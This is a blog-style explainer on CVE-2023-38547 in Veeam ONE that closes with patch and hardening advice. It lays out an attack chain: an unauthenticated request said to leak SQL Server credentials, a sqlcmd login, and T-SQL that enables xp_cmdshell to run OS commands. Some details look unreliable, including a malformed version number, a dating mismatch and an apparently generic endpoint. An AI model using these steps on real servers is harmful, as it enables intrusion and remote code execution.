CVE-2023-38547 - How Attackers Can Use Veeam ONE’s SQL Server Info Leak for RCE

Veeam ONE is a popular monitoring and reporting solution for backup infrastructures—used worldwide by many companies. But in June 2023, a serious security hole, CVE-2023-38547, was found in Veeam ONE. It allows unauthenticated attackers to steal SQL server connection info, which can then be used to run code remotely on the SQL server.

In this post, I’ll explain what this vulnerability is, how it can be exploited, and what you can do to stay safe. I’ll include simple examples and useful links for further research.

What is CVE-2023-38547?

CVE-2023-38547 is an information disclosure vulnerability in Veeam ONE’s web interface. Attackers do not need to log in. They simply send a special web request, and the server responds with critical info about the SQL Server connection used for the Veeam ONE configuration database.

Why is this dangerous?

With these details (such as SQL Server address, database name, username—and sometimes even the password), an attacker can:

Try to escalate privileges if low-priv accounts are used

- Even upload and execute malicious code (RCE) on the SQL server host, depending on SQL Server settings

1. Exposing SQL Server Credentials

The vulnerable REST API endpoint on Veeam ONE responds to a request by returning the server’s connection info.

Example HTTP EXploit Request

GET /api/auth/session?anyparam=anyvalue HTTP/1.1
Host: veeamonserver.company.com

Example Server Response

{
  "DataSource":"SQLSERVER01.company.com",
  "InitialCatalog":"VeeamOne",
  "UserID":"veeamoneuser",
  "Password":"P@sswrd!",
  ...
}

(Fields may vary by server version and config.)

Now, the attacker knows where the SQL database lives and what credentials to use.

2. Connecting to the SQL Server

Using something simple like sqlcmd or tools like DBeaver, the attacker can connect remotely (if SQL allows remote logins):

sqlcmd -S SQLSERVER01.company.com -U veeamoneuser -P "P@sswrd!"

Once connected, they can run queries, extract more data, or try to escalate privileges.

3. Achieving Remote Code Execution (RCE)

If the database is running with high privileges (like sa account) or has vulnerable extended stored procedures (like xp_cmdshell enabled!), the attacker can execute OS commands on the SQL Server host.

Example: Enabling xp_cmdshell and running a command

-- Enable advanced options
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

-- Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Execute a remote command (e.g., add user, download malware)
EXEC xp_cmdshell 'whoami';

This would print the Windows account used by SQL Server, or worse, let the attacker run malware.

Original References

- Veeam Advisory VEEAM-ONE-2023-38547 — Official Veeam security bulletin
- NIST NVD Record CVE-2023-38547
- Rapid7 Analysis

Protecting Yourself

- Update Immediately: Veeam has fixed this in version 12 (12..1.2591). Patch all affected servers.

Block External Access: Don’t expose the Veeam ONE web interface to the Internet.

- Restrict SQL Server Access: Ensure only intended hosts/users can reach your SQL server.
- Use Strong, Unique Passwords: And never run databases as sa or other privileged accounts unnecessarily.

Patch now, and review your DB security!

The bottom line is, don’t delay—even a small leak like server connection info can be a wide-open door for skilled attackers. If you use Veeam ONE, update today.


> Found this helpful? Share with your IT team or customers. Stay safe!

Further Reading

- Veeam Official Security Center
- How Attackers Exploit SQL Server Misconfigurations
- The Dangers of xp_cmdshell

Timeline

Published on: 11/07/2023 07:15:00 UTC
Last modified on: 11/14/2023 19:46:00 UTC